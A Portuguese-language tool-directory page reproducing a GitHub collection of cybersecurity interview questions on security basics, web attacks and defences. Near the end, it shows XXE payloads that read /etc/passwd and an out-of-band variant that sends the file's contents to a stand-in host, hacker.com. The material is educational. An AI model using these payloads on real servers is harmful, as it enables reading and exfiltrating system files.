Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Interview_Tips — Resumo de perguntas de entrevista de Cyber Security pelas quais passei, espero que ajude | Kitploit
Ferramentas/GitHubGitHub/jigerjain/interview_tips
Segurança WebSegurança de RedeCriptografiaSegurança na NuvemAprendizado e EducaçãoRecursos CuradosTrilhas e CursosExploração de Binários
GitHubjigerjain/interview_tips

Interview_Tips

Resumo de perguntas de entrevista de Cyber Security pelas quais passei, espero que ajude

Ver Repositório
691723há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Dicas para Entrevistas (Segurança da Informação)

Esta página é um resumo de entrevistas pelas quais passei, cobrindo uma variedade razoável de cargos; recebi várias rejeições, no entanto, aprendi com cada entrevista, coletei feedback construtivo e segui em frente. Espero que estas perguntas/dicas possam ajudar você.

Os cargos que geralmente cobre são os seguintes:

  • Estagiário de Segurança Cibernética
  • Estagiário de Testes de Penetração / Red Team
  • Estagiário de Segurança de Aplicações Web / Aplicações
  • Estagiário de Segurança de Produto
  • Estagiário de Segurança de Infraestrutura

Dica rápida:

  • Revise seu currículo e faça perguntas relacionadas a ele para si mesmo antecipadamente
  • Se você não conhece alguma pergunta/conceito, não fuja do assunto, deixe claro que você pode aprendê-lo dado um ambiente para trabalhar
    Você não pode saber tudo, seja humilde para aceitar se respondeu algo errado ou se precisa de esclarecimento
  • Prepare uma breve biografia sobre você antecipadamente para se apresentar
  • Tenha certeza sobre seu objetivo final e por que infosec?
  • Por fim, pergunte sobre feedback no final da entrevista, porquê, porque: ajuda a conhecer e preencher as lacunas do seu conhecimento atual em infosec

Tentei anotar abaixo todas as perguntas possíveis que encontrei e forneci respostas para algumas. As demais você pode pesquisar no Google pelas respostas específicas, se quiser se aprofundar. Além disso, há algumas referências no final; dê uma olhada. Elas foram realmente úteis.

Adoraria adicionar mais perguntas conforme avanço e reviso minhas anotações, no entanto, agradeceria se você pudesse me dar um feedback construtivo sobre isto, entrando em contato comigo via [email protected]. Se você encontrou algo que não está coberto aqui, sinta-se à vontade para compartilhar.

Perguntas comuns

  1. Tríades de Segurança:

O que é CIA?

  • Confidencialidade
  • Integridade
  • Disponibilidade

O que é AAA?

  • Autenticação
  • Autorização
  • Contabilização
  1. Diferença entre Ameaça, Vulnerabilidade, Exploits e Risco e como eles se relacionam com Ativos
  • Ameaça:
    Uma ameaça é aquilo contra o qual estamos tentando nos proteger
  • Vulnerabilidade:
    Uma vulnerabilidade é uma fraqueza ou lacuna em nossos esforços de proteção
  • Exploit:
    Uma habilidade/programa (pode ser um software ou habilidade de engenharia social) que foi desenvolvida para atacar um ativo tirando proveito de uma vulnerabilidade
  • Risco:
    Risco é a interseção entre ativos, ameaças e vulnerabilidades
  • Ativo:
    Um ativo é aquilo que estamos tentando proteger
  1. O que é IAM e por que é usado?
    IAM é o Identity Access Management (Gerenciamento de Identidade e Acesso) usado para segregar funções e responsabilidades dentro de uma organização. É uma peça crítica na segurança. Ajuda a manter a segurança no nível de acesso e privilégios.

Segurança em geral

Fases de um Ataque de Intrusão de Rede:

  • Reconhecimento / Coleta de Informações
  • Obter o acesso necessário
  • Manter o acesso
  • Cobrir os rastros (Excluir logs, backdoors e ocultar todos os controles)

Segurança de Aplicações Web

  1. Pergunta comum:
  • OWASP Top 10

  • O que é XSS (Cross-site Scripting)?

    • Pratique XSS em: [https://xss-game.appspot.com/]
    • Como combater XSS: Em resumo, use validação de entrada adequada
    • Procure pelo cabeçalho CSP (Content-Security-Policy)
    • Diferentes tipos de XSS: Refletido, Armazenado e baseado em DOM
    • O que são sources e sinks no DOM que podem levar a XSS:
      [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
  • O que é CSRF Esta é a pergunta mais interessante que quase todo entrevistador adoraria fazer
    Dica rápida: Seja breve, se for perguntado(a), só então explique a história completa

    Cross-Site Request Forgery (CSRF) é um ataque que força um usuário final a executar ações indesejadas em uma aplicação web na qual ele está autenticado no momento. Ataques CSRF visam especificamente solicitações de alteração de estado, não roubo de dados, já que o atacante não tem como ver a resposta à solicitação forjada. Com uma pequena ajuda de engenharia social (como enviar um link por e-mail ou chat), um atacante pode enganar os usuários de uma aplicação web para que executem ações escolhidas pelo atacante. Se a vítima for um usuário comum, um ataque CSRF bem-sucedido pode forçar o usuário a realizar solicitações de alteração de estado, como transferir fundos, alterar seu endereço de e-mail e assim por diante. Se a vítima for uma conta administrativa, o CSRF pode comprometer toda a aplicação web.

  • Como combater CSRF:
    Use Tokens Anti-CSRF
    Use a política de mesma origem (same-origin policy)
    Uso do cabeçalho Referrer

  • O que é codificação HTML/URL?

  • O protocolo HTTP é sem estado (stateless)?
    HTTP é inerentemente um protocolo sem estado, porém o servidor usa cookies para torná-lo com estado (stateful)

  • Quais são os tipos de injeções: SQL, Command, OS

  • Como combater injeções SQL
    Use consultas parametrizadas (parameterized queries) e procedimentos armazenados (stored procedures)

  1. Verifique os cabeçalhos que ajudam a fornecer segurança (Confira as URLs e leia o conteúdo, isso ajudará a construir seus fundamentos):
  • CSP (Content-Security Policy) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
    [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
  • CORS (Cross-Origin Resource Sharing) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
  • Política de mesma origem (Same-Origin policy) [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
  1. Existem cenários raros em que um entrevistador perguntaria estas coisas; encontrei as seguintes em etapas posteriores de algumas entrevistas, então pensei em mencioná-las:
  • O que é XXE (Entidades Externas XML - XML External Entities)?
    A injeção de entidade externa XML (também conhecida como XXE) é uma vulnerabilidade de segurança web que permite a um atacante interferir no processamento de dados XML por uma aplicação. Frequentemente, permite que um atacante visualize arquivos no sistema de arquivos do servidor da aplicação e interaja com quaisquer sistemas backend ou externos que a própria aplicação possa acessar.
    Confira isto [https://portswigger.net/web-security/xxe]
    Ex.:
    <?xml version="1.0" encoding="UTF-8"?>    
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>     
    <stockCheck><productId>&xxe;</productId></stockCheck> 
    
    Em algumas situações, um atacante pode escalar um ataque XXE para comprometer o servidor subjacente ou outra infraestrutura backend, aproveitando a vulnerabilidade XXE para realizar ataques de server-side request forgery (SSRF).
  • Out-Of-Band - usando entidades XML, dados do servidor podem ser capturados e enviados para hacker.com (NENHUMA saída do servidor é necessária)

Para ser injetado: document.xml

<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
    %remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity

Host externo: http://hacker.com/evil.dtd

<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
                    --- OR ---
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'file://%payl;'>"> - consider error-based

Ref: [https://phonexicum.github.io/infosec/xxe.html]

Baixar ferramenta